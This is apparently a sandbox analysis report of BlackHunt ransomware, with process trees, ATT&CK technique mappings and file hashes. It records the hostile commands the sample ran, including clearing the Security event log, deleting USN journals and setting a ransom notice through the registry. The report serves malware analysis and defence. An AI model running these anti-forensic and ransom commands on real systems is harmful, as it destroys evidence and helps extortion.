C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false1⤵
- Clears Windows event logs
PID:11084
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f1⤵PID:8096
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵PID:10808
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10808 -s 14562⤵
- Program crash
PID:2112
-
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f1⤵
- Kills process with taskkill
PID:15676
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f1⤵PID:5340
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt1⤵PID:14428
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 10808 -ip 108081⤵PID:4016
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\1⤵
- Enumerates connected drives
PID:6524
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\1⤵PID:9132
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57313a819b3b13976b23f05cb31cc048d
SHA19bb4be9d3dd116ad64e7aca5d00ad91e2857d77f
SHA256bb02170d4f046c2007562596cba55c42510a32c192deee5ccdb080ca646b8326
SHA512e1f905241ed137cc40b87e38de3076af4f46c0d87bf2a14586ccf3baa9fc4f11e248b9c95e8551b270dcb376af354d5f972c468c20d13d2e1dba270c724bc583
-
Filesize
684B
MD56c3691af1a5cea2a3629f2916a92662d
SHA1f9511e815b521649fba7b31a1ef2a3b5b7dce6af
SHA25670e078a4c1d418f135ab1e23ad1bbacf6984d22163c12ad60110024f5cbde35d
SHA5123898cd999a61ea975d354537c865d00180b63a27c91d1124a928b4b0c0e8644293bddf3fd103602ced63aab68850b0fb4d6ef834d2ccf89f6ef9835d0390f628
-
Filesize
12KB
MD5188ed64c8f732adc69aaa16fa2437b1a
SHA128a2cf13ce46640ea450a15471b3e77bb3d4c266
SHA2566afb24f7cf3c406d8d7976f912024fd4b5b7f23cfd923422823437f805f48c5f
SHA51229a8f9d4eaa342b73c10c667f01b5b4f06634f82f9a43de2c7b0b1c11492eb990410322f4cff41141d6f3ad952f0f8ba6d3ce8fe7a6d015faf7fb09059eedabf